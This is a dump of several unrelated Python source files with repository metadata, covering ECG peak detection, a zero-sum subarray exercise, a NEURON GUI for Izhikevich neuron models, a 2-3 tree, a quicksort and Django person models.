    t = [0.002 * x for x in range(len(ecg))]
    # print "read data in ", time.time() - tm
    #need to filter signal
    ecgFIR = filterBandPassFIR(ecg)
    y = nonLinearFilter(ecgFIR)
    # print "data filtered in ", time.time() - tm
    n = len(ecg)    # NOTE: shadows the module-level n inside this function
    m = len(ecgFIR)
    # print 'n = ', n
    # print 'm = ', m
    # print 'filter N = ', filterN
    # print 'filterDelay = ', filterDelay
    if plotFlag :
        plt.figure(1)
        # raw signal vs the (delayed) filtered signal
        plt.plot(t[0:n], ecg[0:n], t[filterDelay:n - (filterN - filterDelay)], ecgFIR[0:m], 'r-')
    #adding high-frequency seq
    z = addHFS(y)
    # print "high-frequency seq added in ", time.time() - tm
    D = computeFeature(z)
    # print "d computed in ", time.time() - tm
    Th = computeTheta(D)
    events = getEvents(D, Th)
    # print "events = ", events
    rPeaks = getRpeaks(events, y)
    print "R peaks = ", rPeaks
    d = (n - m) / 2
    # print d
    if plotFlag :
        #plt.figure(2)
        #plt.plot(t[0:n], ecg[0:n],t[d : n - d - 1], z[0:m], 'r-')
        #plt.plot(t[0:m], y[0:m],t[0 : m - 1], D[0:m - 1], 'r-')
        #plt.plot(t[0:len(D)],Th[0:len(D)], t[0 : len(D)], D, 'r-')
        #plt.plot(t[0:len(D)],events,'r-')
        plt.figure(3)
        #plt.plot(t[:1000], ecg[:1000])
        # shift peak indices back by the filter delay to line up with the raw trace
        tt = map(lambda x: (x + filterDelay) * 0.002, rPeaks);
        d = []
        for item in rPeaks :
            d.append(ecg[item + filterDelay])
        plt.plot(t[:m], ecg[:m],'b-', tt, d, 'ro')
        plt.show()
        quit()
    return
main() | [
"maxpilgrim94@gmail.com"
] | maxpilgrim94@gmail.com |
a06f4cacd3ceb7788c1165cbd743fe875f3f06ec | 3387493ac3c18d8d7a1e36f9f268bbaf9a494cf1 | /Find longest subset with sum 0.py | 9b13825c75110628a0dbb3f41f2d580575e44a38 | [] | no_license | Shaurya-L/Data-Structures-and-Algorithms-in-Python | 8b4ca1c23f84c02b1bab4469180c199154bade02 | 1da445905663dcd7035dcd78cc4d56695a32d6fa | refs/heads/master | 2020-09-26T12:22:08.854564 | 2020-01-27T16:27:16 | 2020-01-27T16:27:16 | 226,254,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | def subsetSum(l):
#Implement Your Code Here
d = {}
max_len = 0
curr_sum = 0
for i in range(n):
curr_sum += l[i]
if l[i]==0 and max_len == 0:
max_len = 1
if curr_sum is 0:
max_len = i + 1
if curr_sum in d:
max_len = max(max_len, i - d[curr_sum] )
else:
d[curr_sum] = i
return max_len
# Read the element count and the space-separated list, then print the answer.
n=int(input())
l=list(int(i) for i in input().strip().split(' '))
finalLen= subsetSum(l)
print(finalLen)
| [
"noreply@github.com"
] | noreply@github.com |
50972c24f80116bd960f7350abeb6b01cde72fdf | 4b7806dd0ea8f7eb54bec25eb5afcdfdc02d91cf | /NEURON/izhiGUI.py | 7b966f77d36f4b185374e9a3d30eb777ae9d16a8 | [] | permissive | OpenSourceBrain/IzhikevichModel | ab6018e8392b073d17cb4e29c68108a4397f098a | 83fe93ea390bb240f31e7352f6a4ad744dec43ca | refs/heads/master | 2023-08-31T00:01:19.985460 | 2023-08-18T15:13:31 | 2023-08-18T15:13:31 | 4,956,319 | 23 | 10 | BSD-3-Clause | 2023-09-04T11:06:46 | 2012-07-09T10:41:31 | Jupyter Notebook | UTF-8 | Python | false | false | 15,133 | py | """
izh.py
Python/NEURON GUI for the different celltypes of Izhikevich neuron (versions from 2 publications).
* 2003 Izhikevich artificial neuron model from
EM Izhikevich "Simple Model of Spiking Neurons"
IEEE Transactions On Neural Networks, Vol. 14, No. 6, November 2003 pp 1569-1572
* 2007 Izhikevich artificial neuron model from
EM Izhikevich (2007) "Dynamical systems in neuroscience" MIT Press
Cell types available from Izhikevich, 2007 book:
1. RS - Layer 5 regular spiking pyramidal cell (fig 8.12 from 2007 book)
2. IB - Layer 5 intrinsically bursting cell (fig 8.19 from 2007 book)
3. CH - Cat primary visual cortex chattering cell (fig8.23 from 2007 book)
4. LTS - Rat barrel cortex Low-threshold spiking interneuron (fig8.25 from 2007 book)
5. FS - Rat visual cortex layer 5 fast-spiking interneuron (fig8.27 from 2007 book)
6. TC - Cat dorsal LGN thalamocortical (TC) cell (fig8.31 from 2007 book)
7. RTN - Rat reticular thalamic nucleus (RTN) cell (fig8.32 from 2007 book)
Implementation by: Salvador Dura-Bernal, Cliff Kerr, Bill Lytton
(salvadordura@gmail.com; cliffk@neurosim.downstate.edu; billl@neurosim.downstate.edu)
"""
# adapted from /u/billl/nrniv/sync/izh.hoc
import os, sys, collections
import numpy as np
from neuron import h, gui
h.load_file('stdrun.hoc')
import izhi2007Figs as iz07fig
import izhi2007Wrapper as izh07
import __main__
py = __main__
h.tstop=500
h.cvode_active(0)
h.dt=0.1
izh, cell07 = None, None # must be declared here since needs to be imported elsewhere
type2003 = collections.OrderedDict([
# a b c d vviv tstop
('regular spiking (RS)' , (0.02 , 0.2 , -65.0 , 8.0 , -63.0 , 150.0)) ,
('intrinsically bursting (IB)' , (0.02 , 0.2 , -55.0 , 4.0 , -70.0 , 150.0)) ,
('chattering (CH)' , (0.02 , 0.2 , -50.0 , 2.0 , -70.0 , 150.0)) ,
('fast spiking (FS)' , (0.1 , 0.2 , -65.0 , 2.0 , -70.0 , 150.0)) ,
('thalamo-cortical (TC)' , (0.02 , 0.25, -65.0 , 0.05 , -63.0 , 150.0)) ,
('thalamo-cortical burst (TC)' , (0.02 , 0.25, -65.0 , 0.05 , -87.0 , 150.0)) ,
('resonator (RZ)' , (0.1 , 0.26 , -65.0 , 2.0 , -70.0 , 100.0)) ,
('low-threshold spiking (LTS)' , (0.02 , 0.25 , -65.0 , 2.0 , -63.0 , 250.0))])
type2004 = collections.OrderedDict([
# a b c d vviv tstop
('tonic spiking' , (0.02 , 0.2 , -65.0 , 6.0 , -70.0 , 100.0)) ,
('mixed mode' , (0.02 , 0.2 , -55.0 , 4.0 , -70.0 , 160.0)) ,
('spike latency' , (0.02 , 0.2 , -65.0 , 6.0 , -70.0 , 100.0)) ,
('rebound spike' , (0.03 , 0.25 , -60.0 , 4.0 , -64.0 , 200.0)) ,
('Depolarizing afterpotential' , (1.0 , 0.2 , -60.0 , -21.0 , -70.0 , 50.0)) ,
('phasic spiking' , (0.02 , 0.25 , -65.0 , 6.0 , -64.0 , 200.0)) ,
('spike frequency adaptation' , (0.01 , 0.2 , -65.0 , 8.0 , -70.0 , 85.0)) ,
('subthreshold oscillations' , (0.05 , 0.26 , -60.0 , 0.0 , -62.0 , 200.0)) ,
('rebound burst' , (0.03 , 0.25 , -52.0 , 0.0 , -64.0 , 200.0)) ,
('accomodation' , (0.02 , 1.0 , -55.0 , 4.0 , -65.0 , 400.0)) ,
('tonic bursting' , (0.02 , 0.2 , -50.0 , 2.0 , -70.0 , 220.0)) ,
('Class 1' , (0.02 , -0.1 , -55.0 , 6.0 , -60.0 , 300.0)) ,
('resonator' , (0.1 , 0.26 , -60.0 , -1.0 , -62.0 , 400.0)) ,
('threshold variability' , (0.03 , 0.25 , -60.0 , 4.0 , -64.0 , 100.0)) ,
('inhibition-induced spiking' , (-0.02 , -1.0 , -60.0 , 8.0 , -63.8 , 350.0)) ,
('phasic bursting' , (0.02 , 0.25 , -55.0 , 0.05 , -64.0 , 200.0)) ,
('Class 2' , (0.2 , 0.26 , -65.0 , 0.0 , -64.0 , 300.0)) ,
('integrator' , (0.02 , -0.1 , -55.0 , 6.0 , -60.0 , 100.0)) ,
('bistability' , (0.1 , 0.26 , -60.0 , 0.0 , -61.0 , 300.0)) ,
('inhibition-induced bursting' , (-0.026 , -1.0 , -45.0 , -2.0 , -63.8 , 350.0))])
choices = collections.OrderedDict([
('2003 PP model' , (lambda: h.Izhi2003a(0.5,sec=cell03), lambda: izh._ref_V, type2003)),
('2003 Sec model', (lambda: h.Izhi2003b(0.5,sec=cell03), lambda: cell03(0.5)._ref_v, type2003)),
('2004 PP model' , (lambda: h.Izhi2003a(0.5,sec=cell03), lambda: izh._ref_V, type2004)),
('2004 Sec model', (lambda: h.Izhi2003b(0.5,sec=cell03), lambda: cell03(0.5)._ref_v, type2004)),
('2007 PP model' , (lambda: izh07.IzhiCell(host=izh07.dummy), lambda: izh._ref_V, izh07.type2007)),
('2007 Sec model' , (lambda: izh07.IzhiCell(), lambda: cell07.sec(0.5)._ref_v, izh07.type2007))])
ch=choices.keys()
def newmodel (ty=None) :
  """Return True when the model tag names a 2007-series model.

  2003/2004 was the original model; 2007 is the redesign.  Falls back to the
  module-global ``izhtype`` when *ty* is not given.
  """
  tag = izhtype if ty is None else ty
  return tag.find('2007') > -1
#* setup the cell
# Default model variant shown at startup; winup() rebinds this global.
izhtype='2004 PP model'
def cellset ():
  """Build the cell / point process for the current global izhtype.

  Rebinds the module globals cell07/cell03, izh (the Izhikevich mechanism),
  vref (voltage reference factory result), uvvset (v/u initializer), and fih
  (FInitializeHandlers that run uvvset and Isend at simulation init).
  """
  global cell07, cell03, izh, vref, uvvset, fih, izhtype
  if newmodel():
    cell07 = choices[izhtype][0]()
    izh = cell07.izh
    def uvvset () : pass  # 2007 wrapper handles its own initialization
  else:
    cell03 = h.Section(name="cell2003") # this cell will be used for 2003/4; different cell created in izhi2007Wrapper for those
    izh = choices[izhtype][0]()
    def uvvset () : vref[0], izh.u = vviv, vviv*izh.b  # seed v and u from the cell-type's vviv
    cell03.L, cell03.diam = 6.37, 5 # empirically tuned -- cell size only used for Izh1
  fih = [h.FInitializeHandler(uvvset), h.FInitializeHandler(0,Isend)]
  vref = choices[izhtype][1]() # can define this afterwards even though used in uvvset above
  # h('objref izh'); h.izh = izh # if need to access from hoc
#* parameters for different cell types
# playvec/playtvec: amplitude/time vectors Vector.play()ed into izh.Iin for
# the ramp-style protocols (Class 1, Class 2, accomodation); see playinit().
playvec, playtvec = [h.Vector() for x in range(2)]
# initialization routines
name, params = None, None  # currently selected cell-type name and its parameter tuple
def p (nm, pm=None) :
  """Select cell type *nm* (a key of the current model's parameter table),
  apply its parameters to the izh mechanism, then redraw and run.
  *pm* optionally overrides the looked-up parameter tuple.  (Python 2 file.)
  """
  global name, vviv, params, vvset  # NOTE(review): 'vvset' looks unused here -- possibly meant uvvset; confirm
  if pm is None : pm = choices[izhtype][2][nm]
  name, params = nm, pm
  if newmodel():
    # 2007 parameterization
    izh.C, izh.k, izh.vr, izh.vt, izh.vpeak, izh.a, izh.b, izh.c, izh.d, izh.celltype = params
    h.tstop=1000
  else:
    # 2003/2004 parameterization (vviv = initial v, also used by uvvset)
    izh.a, izh.b, izh.c, izh.d, vviv, h.tstop = params
  g.size(0,h.tstop,-100,50)
  try:
    if newmodel():
      graphx() # interviews graphics
      iz07fig.recorder(cell07, choices[izhtype][1]()) # vectors to draw under matplotlib
      iz07fig.test1(cell07, nm, izhtype)
    else:
      iz07fig.closeFig()
      graphx()
      playinit()
      h.run()
  except: print sys.exc_info()[0],' :',sys.exc_info()[1]
def ivwrap (func, label=''):
  """Run GUI-builder *func* inside a fresh InterViews VBox, map the box on
  screen under *label*, and return it so the caller can unmap it later."""
  wrapper = h.VBox()
  wrapper.intercept(1)  # divert subsequent panel creation into the box
  func()
  wrapper.intercept(0)
  wrapper.map(label)
  return wrapper
def graphx ():
  """(Re)populate the global graph *g* with traces for the current cell."""
  g.erase_all()
  g.addvar("v", choices[izhtype][1](), 2,2)
  g.addvar("u", izh._ref_u, 3,1)
  # FIX: both branches of the original "if newmodel()" conditional were the
  # identical expression izh._ref_Iin, so the test was a no-op -- plot directly.
  g.addvar("Iin", izh._ref_Iin, 4,2)
  try: g.addvar("gsyn", izh._ref_gsyn, 1, 1)  # not every model exposes gsyn
  except: pass
# Stimulus override globals, editable from the Bubox value fields:
# when I0 or I1 is nonzero, Isend() applies I1 at time T1 instead of the
# per-cell-type protocol.
I0=I1=T1=0
def playinit () :
  """Per-run setup: restore the f/g coefficients where they exist, refresh
  the banner label, and (re)build the Vector-played current ramps for the
  protocols that drive izh.Iin from a vector (Class 1, Class 2, accomodation)."""
  global I0,I1,T1
  try: izh.f, izh.g= 5, 140 # standard params: V'=0.04*V^2 + 5*V + 140 - u + Iin
  except: pass  # models without f/g attributes
  bub.label[0] = '%s'%(name)
  if name=='Depolarizing afterpotential': bub.label[0] = "%s -- REPEATED SPIKING"%(bub.label[0])
  if name=='accomodation': bub.label[0] = "%s -- NOT IMPLEMENTED (different functional form;see izh.mod)"%(bub.label[0])
  if name=='inhibition-induced bursting': bub.label[0] = "%s -- NOT IMPLEMENTED (convergence problems)"%(bub.label[0])
  g.label(0.1,0.9,bub.label[0])
  print bub.label[0]
  # clear any ramp left over from the previous run
  playvec.play_remove()
  playtvec.resize(0); playvec.resize(0)
  if name=='Class 1' :
    T1=30
    playtvec.append(0,T1,h.tstop)
    playvec.append(0,0,0.075*(h.tstop-T1))  # linear current ramp after T1
  elif name=='Class 2' : # (H) Class 2 exc.
    T1=30
    playtvec.append(0,T1,h.tstop)
    playvec.append(-0.5, -0.5,-0.05+0.015*(h.tstop-T1))
  elif name=='accomodation' : # (R) accomodation
    playtvec.append(0, 200, 200.001, 300, 312.5, 312.501, h.tstop)
    playvec.append( 0, 200/25, 0 , 0 , 4 , 0 , 0)
  if name in ['Class 1', 'Class 2', 'accomodation'] : playvec.play(izh._ref_Iin, playtvec, 1)
  if name in ['Class 1', 'integrator'] :
    try: izh.f, izh.g = 4.1, 108 # don't exist in all the models
    except: pass
def synon () :
  "Turn on a synapse"
  # ns/nc are kept as module globals so the NetStim/NetCon survive after
  # this function returns (locals would be garbage-collected).
  global ns, nc
  ns = h.NetStim()
  nc = h.NetCon(ns,izh,0,1,10)  # args: source, target, threshold, delay, weight
  ns.start, ns.interval, ns.number = 10, 10, 10
  nc.weight[0] = 2   # NetCon weight is a vector; element 0 is the weight
  izh.taug = 3
#* box of buttons
class Bubox :
  """Button box: control window showing the model equations, a RUN button,
  I0/I1/T1 value editors, and one button per spike pattern in the table."""
  def __init__ (self, type, li) :
    self.izhtype = type
    vbox, hbox, hbox1 = h.VBox(), h.HBox(), h.HBox()
    self.vbox = vbox
    lil = len(li)
    # grid layout (cols, rows) keyed by the number of patterns in the table
    self.cols, self.rows = {20:(4,5), 8:(4,2), 9:(3,3)}[lil]
    self.label=h.ref('================================================================================')
    vbox.intercept(1)
    h.xpanel("")
    h.xvarlabel(self.label)
    # show the governing equations for the selected model generation
    if newmodel(self.izhtype):
      h.xlabel("V' = (k*(V-vr)*(V-vt) - u + Iin)/C if (V>vpeak) V=c [reset]")
      h.xlabel("u' = a*(b*(V-vr) - u) if (V>vpeak) u=u+d")
    else:
      h.xlabel("v' = 0.04*v*v + f*v + g - u + Iin; if (v>thresh) v=c [reset]")
      h.xlabel("u' = a*(b*v - u); if (v>thresh) u=u+d")
    h.xpanel()
    hbox1.intercept(1)
    h.xpanel(""); h.xbutton("RUN",h.run); h.xpanel()
    self.xvalue('I0','I0')
    self.xvalue('I1','I1')
    self.xvalue('T1','T1')
    hbox1.intercept(0); hbox1.map("")
    hbox.intercept(1)
    for ii,(k,v) in enumerate(li.iteritems()):  # Python 2 dict iteration
      if ii%self.rows==0: h.xpanel("")
      # the outer lambda freezes (k, v) per button; functools.partial would also work
      h.xbutton(k, (lambda f, arg1, arg2: lambda: f(arg1,arg2))(p, k, v)) # alternative is to use functools.partial
      if ii%self.rows==self.rows-1: h.xpanel()
    hbox.intercept(0); hbox.map("")
    vbox.intercept(0); vbox.map("Spike patterns")
    self.label[0]=""
  def pr (): pass  # default no-op callback for value editors
  def xvalue (self,name,var,obj=py,runner=pr):
    # field editor bound to attribute *var* of *obj*
    # NOTE(review): 'py' is defined elsewhere in this file (hoc Python object?) -- confirm
    h.xpanel("")
    h.xvalue(name,(obj, var),0,runner)
    h.xpanel()
  def xpvalue (self,name,ptr,runner=pr):
    "Doesn't work currently"
    h.xpanel("")
    h.xpvalue(name,ptr,1,runner)
    h.xpanel()
  def transpose (self,x) : return int(x/self.rows) + x%self.rows*self.cols  # row-major -> column-major index
# end class Bubox
# current injections for specific models
def Isend () :
  """FInitializeHandler callback: queue the current-injection protocol for the
  selected cell type *name* as CVode events (via Isend1).  Times default to
  fractions of h.tstop; several protocols override T1 explicitly."""
  global T1,I0,I1
  if I0!=0 or I1!=0:
    # Manual override from the I0/I1/T1 fields.
    Iin = I0   # NOTE(review): assigns a local, not izh.Iin -- I0 appears ineffective; confirm intent
    Isend1(T1,I1)
    return
  T1=h.tstop/10
  if not newmodel(): izh.Iin=0
  if name=='tonic spiking': # (A) tonic spiking
    Isend1(T1,14)
  elif name=='phasic spiking': # (B) phasic spiking
    T1=20
    Isend1(T1,0.5)
  elif name=='tonic bursting': # (C) tonic bursting
    T1=22
    Isend1(T1,15)
  elif name=='phasic bursting': # (D) phasic bursting
    T1=20
    Isend1(T1,0.6)
  elif name=='mixed mode': # (E) mixed mode
    Isend1(T1,10)
  elif name=='spike frequency adaptation': # (F) spike freq. adapt
    Isend1(T1,30)
  elif name=='Class 1': # (G) Class 1 exc. -- playvec
    pass  # current ramp is Vector.play()ed in playinit()
  elif name=='Class 2': # (H) Class 2 exc. -- playvec
    pass  # current ramp is Vector.play()ed in playinit()
  elif name=='spike latency': # (izh.Iin) spike latency
    Isend1(T1,7.04)
    Isend1(T1+3,0.0)
  elif name=='subthreshold oscillations': # (J) subthresh. osc.
    Isend1(T1,2)
    Isend1(T1+5,0)
  elif name=='resonator': # (K) resonator
    # two pulse pairs; spacing determines whether the cell resonates
    T2, T3 = T1+20, 0.7*h.tstop
    T4 = T3+40
    Isend1(T1,0.65) ; Isend1(T2,0.65) ; Isend1(T3,0.65) ; Isend1(T4,0.65)
    Isend1(T1+4,0.) ; Isend1(T2+4,0.) ; Isend1(T3+4,0.) ; Isend1(T4+4,0.)
  elif name=='integrator': # (L) integrator
    T1, T3 = h.tstop/11, 0.7*h.tstop
    T2, T4 = T1+5, T3+10
    Isend1(T1,9) ; Isend1(T2,9) ; Isend1(T3,9) ; Isend1(T4,9)
    Isend1(T1+2,0.) ; Isend1(T2+2,0.) ; Isend1(T3+2,0.) ; Isend1(T4+4,0.)
  elif name=='rebound spike': # (M) rebound spike
    T1=20
    Isend1(T1,-15)
    Isend1(T1+5,0)
  elif name=='rebound burst': # (N) rebound burst
    T1=20
    Isend1(T1,-15)
    Isend1(T1+5,0)
  elif name=='threshold variability': # (O) thresh. variability
    T1, T2, T3 =10, 70, 80
    Isend1(T1,1) ; Isend1(T2,-6) ; Isend1(T3,1)
    Isend1(T1+5,0.) ; Isend1(T2+5,0.) ; Isend1(T3+5,0.)
  elif name=='bistability': # (P) bistability
    T1, T2, izh.Iin = h.tstop/8, 216, 0.24
    Isend1(T1,1.24) ; Isend1(T2,1.24)
    Isend1(T1+5,0.24); Isend1(T2+5,0.24)
  elif name=='Depolarizing afterpotential': # (Q) DAP depolarizing afterpotential
    T1 = 10
    Isend1(T1-1,20)
    Isend1(T1+1,0)
  elif name=='accomodation': # (R) accomodation -- playvec
    pass  # current waveform is Vector.play()ed in playinit()
  elif name=='inhibition-induced spiking': # (S) inhibition induced spiking
    izh.Iin=80
    Isend1(50,75)
    Isend1(250,80)
  elif name=='inhibition-induced bursting': # (T) inhibition induced bursting
    izh.Iin=80
    Isend1(50,80) # Isend1(50,75) -- will crash simulator
    Isend1(250,80)
  elif name=='regular spiking (RS)': # regular spiking (RS)
    Isend1(T1,14)
  elif name=='intrinsically bursting (IB)': # intrinsically bursting (IB)
    Isend1(T1,11)
  elif name=='chattering (CH)': # chattering (CH)
    Isend1(T1,10)
  elif name=='fast spiking (FS)': # fast spiking (FS)
    Isend1(T1,10)
  elif name=='thalamo-cortical (TC)': # thalamo-cortical (TC)
    Isend1(2*T1,1.5)
  elif name=='thalamo-cortical burst (TC)': # thalamo-cortical burst (TC)
    Isend1(0,-25)
    Isend1(3*T1,0)
  elif name=='resonator (RZ)': # resonator (RZ)
    Isend1(0,-2)
    Isend1(T1,-0.5)
    Isend1(T1+50,10)
    Isend1(T1+55,-0.5)
  elif name=='low-threshold spiking (LTS)': # low-threshold spiking (LTS)
    Isend1(T1,10)
  elif name == 'TC_burst': # thalamo-cortical burst (TC) (2007)
    Isend1(0,-1200)
    Isend1(120,110)
  elif name == 'RTN_burst': # reticular thalamic nucleus burst (TC) (2007)
    Isend1(0,-350)
    Isend1(120,90)
def Isend1 (tm, Iin) :
  """Queue a CVode event that sets izh.Iin to *Iin* at time *tm* (ms) and
  re-initializes the integrator so the step change is handled cleanly."""
  def my_event():
    izh.Iin = Iin
    h.CVode().re_init()
  h.cvode.event(tm, my_event)
# izhstim() sets up a single stim into izh cell
# effect easily seen by running "Class 1"
def izhstim () :
  """Attach a single NetStim spike source to the current izh cell."""
  stim=h.NetStim(0.5)
  stim.number = stim.start = 1
  nc = h.NetCon(stim,izh)
  nc.delay = 2
  # BUG FIX: NetCon.weight is a vector in NEURON's Python API -- assigning to
  # the bare attribute fails; index element 0 (consistent with synon()).
  nc.weight[0] = 0.1
  # NOTE(review): stim/nc are locals and may be garbage-collected on return
  # (synon() keeps its objects as globals) -- confirm intended lifetime.
  izh.erev = -5
#* plotting & printing
# GUI singletons: main graph, point-process parameter menu, button box.
g, nmenu, bub = None, None, None
def isinstanceh (objref,objtype):
  """True when hoc object *objref* has the same hoc template as *objtype*
  (compares hname() prefixes; a template hname ends in '[]', so drop the
  last two characters before the prefix test)."""
  template_name = objtype.hname()[:-2]
  return objref.hname().startswith(template_name)
def winup (izht=izhtype):
  """Switch to model variant *izht*: rebuild the cell, (re)create the graph
  window if needed, and replace the button box and point-process menu."""
  global bub, g, nmenu, izhtype
  izhtype = izht # swap in the new one
  cellset()
  if g is None:
    g=h.Graph(0)
    h.graphList[0].append(g)  # register so the graph updates during runs
  if g.view_count()<1:
    g.view(-0.1*h.tstop,-90,1.2*h.tstop,150,300,200,400,200)
  g.size(0,h.tstop,-80,40)
  if not bub is None: bub.vbox.unmap()  # drop the previous button box window
  bub = Bubox(izhtype,choices[izhtype][2])
  bub.label[0] = izhtype
  if not nmenu is None: nmenu.unmap()
  nmenu = ivwrap(lambda: h.nrnpointmenu(izh), izh.hname())
def chwin ():
  "Launch windows from model list"
  h.xpanel("Izhikevich models")
  # outer lambda returns inner lambda so as to pass arg to winup() -- the innermost routine
  for c in ch:
    h.xbutton(c, (lambda f, arg1: lambda: f(arg1))(winup,c))
  h.xpanel()
def vtvec(vv):
    """Return a time axis for recorded vector *vv*, sampled at h.dt."""
    n = len(vv)
    return np.linspace(0, n * h.dt, n, endpoint=True)
if __name__ == '__main__': chwin()  # standalone launch: open the model chooser window
| [
"p.gleeson@gmail.com"
] | p.gleeson@gmail.com |
21a493288805c9f4249815db526a22a557cd0946 | 45e7ede656fa223ea3b5c359ccd8f9bdcdb0e357 | /Ayudantía 8/23tree.py | d65fb9dbc95ab7b6a051355afd254d142f27e34c | [
"MIT"
class Node:
    """One node of a 2-3 tree: one or two sorted keys in ``data``, and up to
    three children in ``child`` (empty for a leaf)."""

    def __init__(self, value, parent=None):
        # BUG FIX: _split() constructs nodes as Node(value, parent); the old
        # single-argument __init__ made those calls raise TypeError.
        self.data = [value]
        self.parent = parent
        self.child = []

    def __str__(self):
        if self.parent:
            return str(self.parent.data) + " : " + str(self.data)
        return "Root: " + str(self.data)

    def __lt__(self, other):
        # BUG FIX: _add() sorts lists of Node objects; Python 3 needs an
        # explicit ordering, so order nodes by their smallest key.
        return self.data[0] < other.data[0]

    def _is_leaf(self):
        return len(self.child) == 0

    def _add(self, new_node):
        """Merge *new_node*'s keys and children into this node; split when the
        node overflows to three keys."""
        for child in new_node.child:
            child.parent = self
        self.data.extend(new_node.data)
        self.data.sort()
        self.child.extend(new_node.child)
        if len(self.child) > 1:
            self.child.sort()
        if len(self.data) > 2:
            self._split()

    # Find the correct node in which to insert the new node.
    def _insert(self, new_node):
        """Descend to the proper leaf and merge *new_node* there."""
        # If this is a leaf, absorb the data here and rebalance.
        if self._is_leaf():
            self._add(new_node)
        # Otherwise descend into the correct child recursively.
        elif new_node.data[0] > self.data[-1]:
            self.child[-1]._insert(new_node)
        else:
            for i in range(0, len(self.data)):
                if new_node.data[0] < self.data[i]:
                    self.child[i]._insert(new_node)
                    break

    # When a node holds 3 keys, split it into a new subtree and add it to the parent.
    def _split(self):
        """Split a 3-key node into a 1-key node with two children, then push
        the resulting subtree into self.parent (or keep it here at the root)."""
        left_child = Node(self.data[0], self)
        right_child = Node(self.data[2], self)
        if self.child:
            # Redistribute the four children between the two new nodes.
            self.child[0].parent = left_child
            self.child[1].parent = left_child
            self.child[2].parent = right_child
            self.child[3].parent = right_child
            left_child.child = [self.child[0], self.child[1]]
            right_child.child = [self.child[2], self.child[3]]
        self.child = [left_child]
        self.child.append(right_child)
        self.data = [self.data[1]]
        # We now have a new subtree; hand it to the parent node.
        if self.parent:
            if self in self.parent.child:
                self.parent.child.remove(self)
            self.parent._add(self)
        else:
            left_child.parent = self
            right_child.parent = self

    # Search for an item in the tree; return it if found, else False.
    def _find(self, item):
        """Return *item* if present in this subtree, otherwise False."""
        if item in self.data:
            return item
        elif self._is_leaf():
            return False
        elif item > self.data[-1]:
            return self.child[-1]._find(item)
        else:
            for i in range(len(self.data)):
                if item < self.data[i]:
                    return self.child[i]._find(item)

    def _remove(self, item):
        pass  # deletion not implemented

    # Print in pre-order.
    def _preorder(self):
        print(self)
        for child in self.child:
            child._preorder()
class Tree:
    """2-3 tree facade over Node; keeps ``self.root`` pointing at the top."""

    def __init__(self):
        self.root = None

    def empty(self):
        # identity test against the None sentinel ('is', not '==')
        return self.root is None

    def insert(self, value):
        """Insert *value* (a new Node is always created); after an insert the
        root pointer is walked back up in case a split created a new root."""
        if self.empty():
            self.root = Node(value)
        else:
            self.root._insert(Node(value))
            while self.root.parent:
                self.root = self.root.parent
        return True

    def remove(self, item):
        pass  # deletion not implemented

    def find(self, item):
        """Return *item* if present, else False (also False for an empty tree,
        which previously raised AttributeError on self.root)."""
        if self.empty():
            return False
        return self.root._find(item)

    def pre_order(self):
        """Print the tree in pre-order; no-op when empty (previously crashed)."""
        if self.empty():
            return
        self.root._preorder()
if __name__=="__main__":
    pass  # library module: nothing to run standalone
| [
"johnbidwellb@gmail.com"
] | johnbidwellb@gmail.com |
def mask(money):
    """Return (number of 5-unit masks *money* can buy, size category)."""
    count = money // 5
    return count, "成人"
# Demo: unpack the (count, size) pair for a budget of 120.
my_x, my_size = mask(120)
print(my_x, my_size)
| [
"52558635+tina8860035@users.noreply.github.com"
] | 52558635+tina8860035@users.noreply.github.com |
bdde1733e3aad7d31e2d6f9dcb889e9c085df1f7 | f1117bf18739dba62a5a50bd86f0fdbf9827434f | /MyQuickSort.py | d5de0db1f857977075bcdcfcc09925b15caf1c25 | [] | no_license | Sohaib-50/MyQuickSort | 9fe8c6b22fa66d8db400fff9d519316893bcc8ef | 7affb3b1346e4266ab392aa1d4172cafabdc90e1 | refs/heads/main | 2023-01-23T22:38:10.330858 | 2020-12-04T15:42:12 | 2020-12-04T15:42:12 | 318,557,220 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,562 | py | from stackwithlist import mystack
def QuickSort(lst):
    """Sort *lst* in place with an iterative quicksort (first element of each
    range is the pivot).  Uses an explicit stack of (left, right) index
    ranges instead of recursion.  Returns None; the list is mutated.
    """
    # BUG FIX: the original returned early only for len == 1, so an empty
    # list fell through and crashed with IndexError when reading the pivot.
    if len(lst) <= 1:
        return
    # A plain list is a LIFO stack (replaces the project-local mystack).
    stack = [(0, len(lst) - 1)]
    while stack:
        current_range = stack.pop()
        left, right = current_range
        loc = left                       # pivot index: first element of the range
        pivot_element = lst[loc]
        # Partition: alternate scanning from the far end toward the pivot,
        # swapping the pivot toward its final sorted position.
        while left < right:
            if loc == left:              # pivot at the left edge -> scan from the right
                while right != loc:
                    if lst[right] < pivot_element:
                        lst[right], lst[loc] = lst[loc], lst[right]
                        loc = right
                        break
                    right -= 1
            else:                        # pivot at the right edge -> scan from the left
                while left != loc:
                    if lst[left] > pivot_element:
                        lst[left], lst[loc] = lst[loc], lst[left]
                        loc = left
                        break
                    left += 1
        if (loc - current_range[0]) > 1:        # left part has 2+ elements
            stack.append((current_range[0], loc - 1))
        if (current_range[1] - loc) > 1:        # right part has 2+ elements
            stack.append((loc + 1, current_range[1]))
# Test code
# lst = "11 55 77 90 40 60 99 22 88 66".split()
# print("List before sorting:", lst)
# QuickSort(lst)
# print("List after sorting:", lst)
| [
"i.am_sa@Yahoo.com"
] | i.am_sa@Yahoo.com |
8603f1ec9bc1cebdababdfa6e7596867c7eec586 | bad4fb6e47603f356d14ea7c4228ffbd20427e6c | /local/lpcevento/evento/models.py | 83ec691569bf2637c7351ac8c762d8494b5f7b74 | [] | no_license | lucas62/trabalhoG1 | 1bc106f100d765b39664b6b701febe3d2f0abc25 | 4591e827875a65fb9ddf86930ee93807825be189 | refs/heads/master | 2021-06-25T15:13:14.592680 | 2017-09-11T20:34:41 | 2017-09-11T20:34:41 | 103,184,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,951 | py | from django.db import models
# Create your models here.
class Pessoa(models.Model):
    """Base person record (name + e-mail) shared by the concrete person types."""
    nome = models.CharField(max_length=150)
    email = models.CharField(max_length=150)  # NOTE(review): EmailField would add validation -- confirm
    def __str__(self):
        return self.nome
class PessoaFisica(Pessoa):
    """Natural person: adds the CPF tax identifier."""
    cpf = models.CharField(max_length=11)
    def __str__(self):
        return '{}'.format(self.nome)
class PessoaJuridica(Pessoa):
    """Legal entity: adds CNPJ and corporate (razão social) name."""
    cnpj = models.CharField(max_length=15)
